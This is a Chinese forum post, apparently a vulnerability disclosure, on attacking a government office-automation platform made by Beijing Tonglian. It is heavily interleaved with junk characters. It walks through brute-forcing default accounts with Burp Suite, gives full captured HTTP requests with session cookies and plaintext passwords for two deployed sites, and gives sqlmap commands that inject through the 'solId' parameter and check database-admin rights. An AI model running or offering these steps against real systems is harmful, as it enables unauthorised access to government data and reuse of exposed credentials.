|
1 y0 d$ L, @4 W2 G* }" l# l
$ X5 X3 O2 D2 O& a: K& k* w% Q
; d7 I9 A h+ v, ]# \+ B r& v( L; g
平台简介:
/ q' R& {5 }, l 6 C$ P/ j/ U) {1 A
$ F, S1 G& d0 w0 i" Y
' v0 N w2 u; c. m/ e3 W" P / D! ]; Z$ _% Y" [( K0 F
; u1 Q# t4 f- X* l% A; e7 |
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ @9 x8 o' m0 _+ u: U- b6 O同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" ^, Q2 `) a3 D7 c7 P
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' x! l) f* B& n7 [( q8 N h5 Q
9 a) X0 s: V0 h! m) W% i7 o4 Y7 q
^$ `6 r n( @, A. G
) @ q6 ^6 a \3 k& K- y8 O4 i |
/ |3 y* t8 h- i7 p J4 T+ S* u
" m1 Z& L6 d, C( M 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 U2 [# Q+ p% H! h6 t: ]
1 n2 q9 K8 l+ C2 q- f) _
' N% M; S6 K& T
2 I4 n6 ?* O/ u
( v8 t$ v3 ~- o5 p8 a |/ T7 h$ T8 p2 E* m Y# h; U- Y4 J
http://1.1.1.1:7197/cap-aco/#(案例2-)
8 t# `1 \- |- _" M: ~
/ \9 h# p9 Z7 D" S% ^
* Y7 r7 d+ a- n# W+ m! g9 l http://www.XXOO.com (案例1-官网网站)
; S$ h) a9 l' Z) e' [! h- T
5 Y* \2 V5 t# V4 e9 d s
$ t/ F2 e- r8 Z % H; }% y5 y' K9 t
$ I( g/ d4 m1 Y, b$ z: N- o
6 }6 n5 |9 o% \6 G, E/ g 漏洞详情:
$ z, \2 H9 J, v2 U* U
! F# b$ ?' |1 o: G$ I8 \, Z, Z- v, [) y, z/ `5 g& ^
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
7 A( i4 z$ ^' ^4 b5 J
% @- e5 n5 j, A/ r2 G: D! o3 x m8 B( J8 f- L9 a
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
- E }/ o& n+ m. e0 i3 F
9 y j! m X4 T" x- T* h/ i4 `' a0 P# O
2 Z) m! J3 g- o8 k4 K. M( E+ A, U0 O
, @! b) D7 s: L0 ^. G. c. \2 n. k# F9 z, ^; H' h$ O
 0 c" `- r$ t7 `
5 h" O: x8 l/ z2 S8 J2 X
9 E d, X4 h# L
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
3 D |' s1 D: Z
7 e" M( |9 N3 H, u+ o
; q7 ]9 O/ k& b( j* h 1、案例1-官方网站- y* z. E+ |7 t+ J
% E6 D* a1 y# |6 R' N. s
_! {$ ]8 w" O
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
1 s0 P2 X- x: Y0 U; c* F6 I/ I& c
# K1 ^5 w! X4 f1 O+ \( H
% T; n: a& q- t6 `0 O" ?: H; a# R Host: www.XXOO.com( n8 r0 D( J! N, f& E! [
" D1 u# y0 D3 A/ W% g
$ A1 z& }9 u8 T2 A! W! _
Proxy-Connection: Keep-Alive9 h9 S& n8 l3 U4 G1 C8 T( G8 q {
: q( J% k. J* t8 n( A: [, M+ N& `. } ]0 m
Accept: application/json, text/javascript, */*; q=0.010 }' m% j/ Q4 j3 n; v1 E
, _2 }! }; s( |9 f. W
+ ~, D2 q; _9 G0 N! O$ K9 w7 u, d# c
Accept-Language: zh-CN
8 R- j. m' s: ?- M- I" V+ j ' h) V- F4 p- W! u3 q
0 x K, W( n" ?, d5 G Content-Type: application/json9 a. X( A/ J' ~6 U: H) R% b5 P
/ G N! d( S* v* ~$ ?' z- y" e9 [
- h q3 N8 U( D User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
) Z- ?+ S, g1 [- C" j
5 F* ` T) v. ?) |
L1 b R6 D: |% r" e% U X-Requested-With: XMLHttpRequest% L& q. ]' w$ B5 f+ D9 K5 x R2 Z
?/ M z/ j* h" J7 J1 E% L* P$ Y* _0 ?: D( ?$ D' `1 l3 u3 H
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
4 D4 B$ i: F8 ] t/ b & T, n6 k- a. Q4 U9 H
6 E1 y# Y) l7 e Accept-Encoding: gzip, deflate, sdch5 |/ M4 w# }1 R9 y) S, S
# c% F1 [+ i8 Y$ T# \
. `- ~- Z% U2 w! \; {
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
) L9 t' Y! u( z+ }* V/ T5 R " d. S1 Y0 q s! p- h5 D1 |
5 L: X8 N/ _% b S/ \! ` 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 i6 z6 M+ b( J/ n/ E3 P9 G
2 t' U1 `: \1 `6 C$ u' E6 b8 Z% |& i3 P; `# g5 @4 `
) Z p" k' T; S @4 J o& m7 { ! K0 _0 I( h1 r6 n$ c
- P# L* o9 S% E
1 x3 B+ k4 i5 H" g- m
6 t2 V3 K% q. b* S; a- H! w7 s0 f+ W. g0 `/ z6 N3 q
" P0 @9 `9 H' r4 M; h d) j- O* Y/ E, D5 C. g
! r4 Q5 h6 G* L( t2 m
0 _9 Y m2 v# w/ J0 c
+ r0 c7 t& o( Q. j2 q0 y% f/ O- K7 K2 d1 M: z' b" H; b7 `, O* w+ Q
# ?; F3 ` f$ G7 T' g 8 D0 }: ~! s( z' D+ M& ?; g( \/ F6 s ~
$ t' f: ~ F* [* D$ |# O
2、案例2-某天河云平台4 G( M# z+ m7 L* A5 X, |
: C8 _& Q3 c- X2 p
9 z4 V. R* Z' X4 Q
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
o% r) h* C. a7 r: F4 K
) z* E/ _' y# h0 o
( P6 I8 w4 z( N& C6 ]1 U Host: 1.1.1.:71976 s% Z1 x0 g/ \2 _3 G+ m; U
! `0 s/ |# ?& f* Q$ d* s+ b, T1 A7 B3 ]) z4 S
Accept: application/json, text/javascript, */*; q=0.01
3 [9 y6 Q- `3 u; L3 \6 o
3 D% l. n+ O5 ~' I) P# V6 U3 X# U* S; a& V% `1 s) w
X-Requested-With: XMLHttpRequest
9 b, j& H6 t8 h7 N+ g u
* ?# K' I/ ]9 B u+ Y
- B1 m# a# m. j' u# y# M+ L( d User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.04 L0 O) M0 T5 j* @7 p$ ]
) A, ~# z- |. Q* b* J+ Z- W* b3 W5 Z6 B' ~* r& q) x7 I
Content-Type: application/json$ Y9 ]! m- L: n5 H3 M. q
0 e. b: C6 o. u" h% W
& G8 K1 k; c0 w) | Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
1 c- {5 d' }2 ? $ H0 v$ X1 P% {& w+ l, p" D
9 g$ t/ s+ x: ?; N% E3 Z' t- B
Accept-Language: zh-CN,zh;q=0.8
: W$ G* i( I; d8 X, B# I 0 Z' ~9 K6 |6 j! p1 w- [/ ^
& j: _4 Y) n! L: m2 W: j# x9 b
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1+ {+ A3 p8 ~. b7 V1 a9 u
$ F% j' F; ?3 a0 A2 C
# h0 q, R" T$ k; c9 r1 b
Connection: close# Q, W/ ~# A+ T
8 Y0 {9 V$ H2 k x; a P2 ]$ w3 N# g' b
- R$ c6 e0 c) l5 }5 u" n 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:' S) h) M8 S+ _* o N" a8 L* I
5 _1 U6 ^& Q* U" Q- ]
4 E$ K T( J: J0 a9 d( A3 w9 v
/ k B+ Z' _8 @7 J' a6 M
3 t5 g) U3 X8 m, {0 o# ]: v/ u7 _
0 ^8 i2 J3 h9 K" A) M c
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对